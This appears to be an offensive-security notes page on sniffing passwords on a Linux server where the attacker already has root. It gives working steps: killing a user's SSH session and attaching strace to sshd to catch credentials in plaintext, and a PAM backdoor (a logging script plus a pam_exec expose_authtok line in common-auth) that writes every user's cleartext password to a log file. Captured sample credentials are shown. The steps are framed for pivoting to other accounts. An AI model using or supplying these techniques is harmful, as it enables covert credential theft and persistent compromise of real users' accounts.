Sniffing Passwords

Strace

With root access on a server we can attach to the SSH service and sniff usernames and passwords in plaintext if a user authenticates. This can be powerful when looking for new accounts to pivot with and/or higher privileged accounts.

[root@victimHost ~]# w
 15:05:18 up 26 days,  6:25,  2 users,  load average: 0.00, 0.05, 0.16
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
unixadm  pts/0    someHost         15:04    6.00s  0.03s  0.00s sshd: unixadm [priv]

[root@victimHost ~]# ps aux | grep ssh
root      1366  0.0  0.0 113000  4368 ?        Ss   Jun02   0:00 /usr/sbin/sshd -D
unixadm  28721  0.0  0.0 176412  2644 ?        S    10:04   0:00 sshd: unixadm@pts/0

[root@victimHost ~]# kill 28721
[root@victimHost ~]# strace -f -p 1366 -e trace=write -o data.log
strace: Process 1366 attached

Modifying PAM

## Create the simple script to log logins
$ sudo vim /usr/local/bin/capture.sh
$ sudo chmod 700 /usr/local/bin/capture.sh
$ cat /usr/local/bin/capture.sh                    
#!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/creds.log

## Create log file and set high permissions so no unauthorized suer reads it
$ sudo touch /var/log/creds.log
$ sudo chmod 600 /var/log/creds.log

## Edit /etc/pam.d/common-auth and add the following line
$ sudo vim /etc/pam.d/common-auth
$ cat /etc/pam.d/common-auth
...
auth optional pam_exec.so quiet expose_authtok /usr/local/bin/capture.sh

## All services using PAM will now be logged to /var/log/creds.log in clear text
➜  ~ sudo cat /var/log/creds.log
[sudo] password for void: 
 Wed Nov 22 12:54:20 CET 2023 p3, Passw0rd!, From: ::1
 Wed Nov 22 12:56:54 CET 2023 void, Passw0rd!, From: